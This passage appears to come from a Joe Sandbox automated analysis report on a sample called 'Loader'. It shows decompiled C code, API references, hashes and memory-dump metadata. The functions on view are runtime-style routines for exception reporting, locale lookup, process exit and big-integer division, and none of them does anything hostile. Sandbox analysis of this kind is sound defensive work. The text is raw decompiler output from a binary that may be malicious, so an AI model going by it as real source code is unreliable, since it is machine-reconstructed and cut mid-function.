				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00AE99D9(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00AEA8E0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00AEA8E0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00AE99D9(_t49);
				}
				return _t49;
			}

0x00ae9814
0x00ae9814
0x00ae9814
0x00ae9828
0x00ae982a
0x00ae982d
0x00ae982d
0x00ae9831
0x00ae9836
0x00ae984e
0x00ae9854
0x00ae985a
0x00ae9860
0x00ae9866
0x00ae986c
0x00ae9872
0x00ae9879
0x00ae9880
0x00ae9887
0x00ae988e
0x00ae9895
0x00ae989c
0x00ae989d
0x00ae98a6
0x00ae98ac
0x00ae98af
0x00ae98b5
0x00ae98c4
0x00ae98d0
0x00ae98db
0x00ae98e2
0x00ae98e9
0x00ae98f4
0x00ae98fc
0x00ae9905
0x00ae9907
0x00ae990a
0x00ae990c
0x00ae9916
0x00ae991e
0x00ae9924
0x00000000
0x00ae992b
0x00ae992e

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00AE9820
IsDebuggerPresent.KERNEL32 ref: 00AE98EC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AE990C
UnhandledExceptionFilter.KERNEL32(?), ref: 00AE9916

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bfd3f2559eef6e99aa369c5f274398c1917550c489146b68ca88dce0fb191434
Instruction ID: a59e58b8a6461661ae2cf35cabccbb1b64024c2c32d0d727494a5608393132a0
Opcode Fuzzy Hash: bfd3f2559eef6e99aa369c5f274398c1917550c489146b68ca88dce0fb191434
Instruction Fuzzy Hash: AC310575D45318DBDF20EFA5D989BCDBBB8AF18300F1041EAE40DAB250EB709A859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00AFED90 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00AFED90(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t89;
				signed int _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t141;

				_t121 = __edx;
				_t50 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t50 ^ _t127;
				_t94 = E00AF4840(__ecx, __edx);
				_t124 =  *(E00AF4840(__ecx, __edx) + 0x34c);
				_t126 = E00AFF0B8(_a4);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					__eflags = 1;
					L38:
					return E00AE95ED(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E00AFB834(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E00AFB834(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						__eflags =  *(_t94 + 0x60);
						if( *(_t94 + 0x60) != 0) {
							goto L36;
						}
						__eflags =  *(_t94 + 0x5c);
						if( *(_t94 + 0x5c) == 0) {
							goto L36;
						}
						__eflags = E00AFB834(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
						if(__eflags != 0) {
							goto L36;
						}
						_push(_t124);
						_t94 = 0;
						_t78 = E00AFF20F(__eflags, _t126, 0);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						__eflags = _t124[1];
						L34:
						if(_t141 == 0) {
							_t124[1] = _t126;
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						__eflags =  *(_t94 + 0x5c) - _t74;
						if( *(_t94 + 0x5c) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
							__eflags = _t80 - _v252;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						__eflags = _t122 - _v256 >> 1 -  *(_t94 + 0x5c);
						if(__eflags != 0) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						_t81 = E00AFF20F(__eflags, _t126, 1);
						__eflags = _t81;
						if(_t81 == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t141 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E00AFB834(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					__eflags = _t115 & 0x00000002;
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					__eflags =  *(_t94 + 0x5c);
					if( *(_t94 + 0x5c) == 0) {
						L12:
						_t121 =  *_t124;
						__eflags = _t121 & 0x00000001;
						if((_t121 & 0x00000001) != 0) {
							goto L16;
						}
						_t90 = E00AFF1EA(_t126);
						__eflags = _t90;
						if(_t90 == 0) {
							goto L16;
						}
						_t121 = _t121 | 0x00000001;
						__eflags = _t121;
						 *_t124 = _t121;
						goto L15;
					}
					_t92 = E00B029D0(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *(_t94 + 0x5c));
					_t128 = _t128 + 0xc;
					__eflags = _t92;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					__eflags =  *_t124;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
						__eflags = _t93 - _v252;
					} while (_t93 != _v252);
					__eflags = _t117 - _t121 >> 1 -  *(_t94 + 0x5c);
					if(_t117 - _t121 >> 1 ==  *(_t94 + 0x5c)) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x00afed90
0x00afed9b
0x00afeda2
0x00afedb0
0x00afedb8
0x00afedc7
0x00afedd3
0x00afede4
0x00afedea
0x00afedf3
0x00afefcd
0x00afefcf
0x00afefd1
0x00afefd1
0x00afefd2
0x00afefe0
0x00afefe0
0x00afee0c
0x00afeec7
0x00afeed2
0x00afefc1
0x00afefc8
0x00000000
0x00afefc8
0x00afeee6
0x00afeefc
0x00000000
0x00000000
0x00afef0c
0x00afef15
0x00afef83
0x00afef86
0x00000000
0x00000000
0x00afef88
0x00afef8b
0x00000000
0x00000000
0x00afef9e
0x00afefa0
0x00000000
0x00000000
0x00afefa2
0x00afefa3
0x00afefa7
0x00afefaf
0x00afefb1
0x00000000
0x00000000
0x00afefb3
0x00afefb9
0x00afefbc
0x00afefbc
0x00afefbe
0x00afefbe
0x00000000
0x00afefbc
0x00afef19
0x00afef1f
0x00afef24
0x00afef36
0x00afef39
0x00000000
0x00000000
0x00afef3b
0x00afef41
0x00afef47
0x00afef47
0x00afef4a
0x00afef4d
0x00afef4d
0x00afef5c
0x00afef5e
0x00afef61
0x00afef7d
0x00000000
0x00afef7d
0x00afef63
0x00afef67
0x00afef6f
0x00afef71
0x00000000
0x00000000
0x00afef73
0x00afef79
0x00afef2e
0x00afef2e
0x00000000
0x00afef2e
0x00afef26
0x00afef2c
0x00000000
0x00afef2c
0x00afee20
0x00afee36
0x00000000
0x00000000
0x00afee46
0x00afee4d
0x00afee51
0x00afee60
0x00afee63
0x00000000
0x00000000
0x00afee65
0x00afee69
0x00afeead
0x00afeead
0x00afeeaf
0x00afeeb2
0x00000000
0x00000000
0x00afeeb5
0x00afeebb
0x00afeebd
0x00000000
0x00000000
0x00afeebf
0x00afeebf
0x00afeec2
0x00000000
0x00afeec2
0x00afee78
0x00afee7d
0x00afee80
0x00afee82
0x00000000
0x00000000
0x00afee84
0x00afee84
0x00afee87
0x00afee8a
0x00afee8d
0x00afee90
0x00afee90
0x00afee93
0x00afee96
0x00afee96
0x00afeea3
0x00afeea6
0x00afeea8
0x00afeea8
0x00afee53
0x00afee59
0x00afee5c
0x00afeec4
0x00afeec4
0x00afeec4

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

Part of subcall function 00AF4840: _free.LIBCMT ref: 00AF48A2
Part of subcall function 00AF4840: _free.LIBCMT ref: 00AF48D8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AFEDE4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AFEE2E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AFEEF4

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: f1959116ca059c12ce1854664bb5deb42792f0f116e59a8183dad76e481e16cc
Instruction ID: 842831b115419f194d10649d9bd4f05715009d1f51fbb4cf9911ff2b6b4c0d17
Opcode Fuzzy Hash: f1959116ca059c12ce1854664bb5deb42792f0f116e59a8183dad76e481e16cc
Instruction Fuzzy Hash: 55617F7191020B9FEB28DF68DD82BBAB7A9EF04300F24417AFA05C6595E734DA90CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AED093 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E00AED093(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xb36bac; // 0x85d5fe2b
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00AE99D9(_t41);
					_pop(_t61);
				}
				E00AEA8E0(_t66,  &_v804, 0, 0x50);
				E00AEA8E0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0xf4458d00
				_v540 =  *_t23;
				_t25 =  &_v0; // 0xae7227
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0xb127d468
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x55cc0000
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xec83ec8b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0xf4458d00
				_v792 =  *_t34;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0xae6efb
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0x2cfee850
					_push( *_t38);
					_t57 = E00AE99D9(_t57);
				}
				_t39 =  &_v8; // 0xffffff12
				return E00AE95ED(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
			}

0x00aed093
0x00aed093
0x00aed093
0x00aed09e
0x00aed0a3
0x00aed0a5
0x00aed0ad
0x00aed0af
0x00aed0b2
0x00aed0b7
0x00aed0b7
0x00aed0c3
0x00aed0d6
0x00aed0e4
0x00aed0ea
0x00aed0f0
0x00aed0f6
0x00aed0fc
0x00aed102
0x00aed108
0x00aed10e
0x00aed114
0x00aed11a
0x00aed121
0x00aed128
0x00aed12f
0x00aed136
0x00aed13d
0x00aed144
0x00aed145
0x00aed14b
0x00aed14e
0x00aed154
0x00aed154
0x00aed157
0x00aed15d
0x00aed167
0x00aed16a
0x00aed170
0x00aed173
0x00aed179
0x00aed17c
0x00aed182
0x00aed185
0x00aed193
0x00aed195
0x00aed19b
0x00aed1aa
0x00aed1b6
0x00aed1b6
0x00aed1b9
0x00aed1be
0x00aed1bf
0x00aed1cb

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00AED18B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00AED195
UnhandledExceptionFilter.KERNEL32(00AE6EFB,?,?,?,?,?,00000001), ref: 00AED1A2

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8d0d32916542420025f59f4b75aaefdecfcd1ea9cad8011be2cff8a5ce276736
Instruction ID: 3dcd3eb39988e6e5faf022edbf24872a6e3c22bbadbe5923753d02dd22ede85c
Opcode Fuzzy Hash: 8d0d32916542420025f59f4b75aaefdecfcd1ea9cad8011be2cff8a5ce276736
Instruction Fuzzy Hash: 5331A274901228ABCB21DF69DD8978DBBB8BF18310F5041EAE41CA7261EB709F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 00AF1D69 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AF1D69(int _a4) {
				void* _t14;

				if(E00AFCF3A(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00AF1DAB(_t14, _a4);
				ExitProcess(_a4);
			}

0x00af1d76
0x00af1d92
0x00af1d92
0x00af1d9b
0x00af1da4

APIs

GetCurrentProcess.KERNEL32(?,?,00AF1D68,?,00000000,?,?,?,00AF6FF2), ref: 00AF1D8B
TerminateProcess.KERNEL32(00000000,?,00AF1D68,?,00000000,?,?,?,00AF6FF2), ref: 00AF1D92
ExitProcess.KERNEL32 ref: 00AF1DA4

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 18e938d6a4d3f1021b98553b34cac9f2feebe77170813c005f08133f756b60b7
Instruction ID: b7f7ec5ede9e402b9b8dd3b93fa59e4f05f3d495618c1172f99ebcb9ae3068e7
Opcode Fuzzy Hash: 18e938d6a4d3f1021b98553b34cac9f2feebe77170813c005f08133f756b60b7
Instruction Fuzzy Hash: D3E04631001A0CEBCB216BA5DD18A2D3B3AFF60741B804418FA0986531EB35DC82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AF06C0 Relevance: 3.4, APIs: 2, Instructions: 450
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00AF06C0(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t244;
				signed int _t245;
				signed int* _t246;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				void* _t251;
				intOrPtr* _t252;
				signed int _t253;
				unsigned int _t254;
				signed int _t256;
				signed int* _t260;
				signed int _t261;
				signed int _t262;
				intOrPtr _t264;
				void* _t268;
				signed char _t274;
				signed int* _t277;
				signed int _t281;
				signed int* _t282;
				intOrPtr* _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t295;
				signed int _t296;
				signed int _t298;
				intOrPtr* _t299;
				signed int _t303;
				signed int _t304;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int _t319;
				signed int _t323;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t334;
				signed int _t341;
				signed int* _t342;

				_t244 = _a4;
				_t325 =  *_t244;
				if(_t325 == 0) {
					L74:
					__eflags = 0;
					return 0;
				} else {
					_t289 = _a8;
					_t190 =  *_t289;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L74;
					} else {
						_t312 = _t190 - 1;
						_t5 = _t325 - 1; // 0x1cb
						_t253 = _t5;
						_v12 = _t253;
						if(_t312 != 0) {
							__eflags = _t312 - _t253;
							if(_t312 > _t253) {
								goto L74;
							} else {
								_t191 = _t253;
								_t291 = _t253 - _t312;
								__eflags = _t253 - _t291;
								if(_t253 < _t291) {
									L19:
									_t291 = _t291 + 1;
									__eflags = _t291;
								} else {
									_t277 =  &(_t244[_t253 + 1]);
									_t341 = _a8 + _t312 * 4 + 4;
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t277;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t341 = _t341 - 4;
										_t277 = _t277 - 4;
										__eflags = _t191 - _t291;
										if(_t191 >= _t291) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t291;
								if(__eflags == 0) {
									goto L74;
								} else {
									_t192 = _a8;
									_t245 = _v56;
									_t326 =  *(_t192 + _t245 * 4);
									_t55 = _t245 * 4; // 0xfffef5c1
									_t254 =  *(_t192 + _t55 - 4);
									asm("bsr eax, esi");
									_v52 = _t326;
									_v36 = _t254;
									if(__eflags == 0) {
										_t313 = 0x20;
									} else {
										_t313 = 0x1f - _t192;
									}
									_v16 = _t313;
									_v48 = 0x20 - _t313;
									__eflags = _t313;
									if(_t313 != 0) {
										_t274 = _t313;
										_v36 = _v36 << _t274;
										_v52 = _t326 << _t274 | _t254 >> _v48;
										__eflags = _t245 - 2;
										if(_t245 > 2) {
											_t68 = _t245 * 4; // 0xe850ffff
											_t70 =  &_v36;
											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t327 = 0;
									_v32 = 0;
									_t292 = _t291 + 0xffffffff;
									__eflags = _t292;
									_v28 = _t292;
									if(_t292 >= 0) {
										_t197 = _t292 + _t245;
										_t247 = _a4;
										_v60 = _t197;
										_v64 = _t247 + 4 + _t292 * 4;
										_t260 = _t247 - 4 + _t197 * 4;
										_v80 = _t260;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t260[2];
											}
											_t296 = _t260[1];
											_t261 =  *_t260;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t261;
											__eflags = _t313;
											if(_t313 != 0) {
												_t303 = _v8;
												_t319 = _t261 >> _v48;
												_t221 = E00B03AF0(_t296, _v16, _t303);
												_t261 = _v16;
												_t198 = _t303;
												_t296 = _t319 | _t221;
												_t327 = _v24 << _t261;
												__eflags = _v60 - 3;
												_v8 = _t303;
												_v24 = _t327;
												if(_v60 >= 3) {
													_t261 = _v48;
													_t327 = _t327 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t261;
													__eflags = _t327;
													_t198 = _v8;
													_v24 = _t327;
												}
											}
											_push(_t247);
											_t199 = E00B03A50(_t296, _t198, _v52, 0);
											_v40 = _t247;
											_t249 = _t199;
											_t328 = _t327 ^ _t327;
											_t200 = _t296;
											_v8 = _t249;
											_v20 = _t200;
											_t314 = _t261;
											_v72 = _t249;
											_v68 = _t200;
											_v40 = _t328;
											__eflags = _t200;
											if(_t200 != 0) {
												L37:
												_t250 = _t249 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E00AE9080(_t250, _t200, _v52, 0);
												asm("adc esi, edx");
												_t249 = _t250 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t328;
												_v8 = _t249;
												_v72 = _t249;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t249 - 0xffffffff;
												if(_t249 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t328;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L41;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L41:
															_v8 = _v24;
															_t219 = E00AE9080(_v36, 0, _t249, _t200);
															__eflags = _t296 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L44:
																_t200 = _v20;
																_t249 = _t249 + 0xffffffff;
																_v72 = _t249;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v52;
																__eflags = _t314;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L44;
																}
															}
															L48:
															_v8 = _t249;
															goto L49;
														}
														_t200 = _v20;
														goto L48;
													}
												}
											}
											L49:
											__eflags = _t200;
											if(_t200 != 0) {
												L51:
												_t262 = _v56;
												_t315 = 0;
												_t329 = 0;
												__eflags = _t262;
												if(_t262 != 0) {
													_t252 = _v64;
													_t210 = _a8 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t262;
													do {
														_v12 =  *_t210;
														_t216 =  *_t252;
														_t268 = _t315 + _v72 * _v12;
														asm("adc esi, edx");
														_t315 = _t329;
														_t329 = 0;
														__eflags = _t216 - _t268;
														if(_t216 < _t268) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t252 = _t216 - _t268;
														_t252 = _t252 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t249 = _v8;
													_t262 = _v56;
												}
												__eflags = 0 - _t329;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L60:
														__eflags = _t262;
														if(_t262 != 0) {
															_t251 = 0;
															_t299 = _v64;
															_t334 = _a8 + 4;
															__eflags = _t334;
															_t316 = _t262;
															do {
																_t264 =  *_t299;
																_t161 = _t334 + 4; // 0x8d8b5959
																_t334 = _t161;
																_t299 = _t299 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t299 - 4)) = _t264 +  *((intOrPtr*)(_t334 - 4)) + _t251;
																asm("adc eax, 0x0");
																_t251 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t249 = _v8;
														}
														_t249 = _t249 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L60;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t249;
												if(_t249 != 0) {
													goto L51;
												}
											}
											_t327 = _v32;
											_t247 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t298 = _v28 - 1;
											_t313 = _v16;
											_t260 = _v80 - 4;
											_v32 = 0 + _t249;
											_t197 = _v60 - 1;
											_v28 = _t298;
											_v60 = _t197;
											_v80 = _t260;
											__eflags = _t298;
										} while (_t298 >= 0);
									}
									_t246 = _a4;
									_t256 = _v12 + 1;
									_t195 = _t256;
									__eflags = _t195 -  *_t246;
									if(_t195 <  *_t246) {
										_t295 =  &(( &(_t246[1]))[_t195]);
										do {
											 *_t295 = 0;
											_t295 =  &(_t295[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t246;
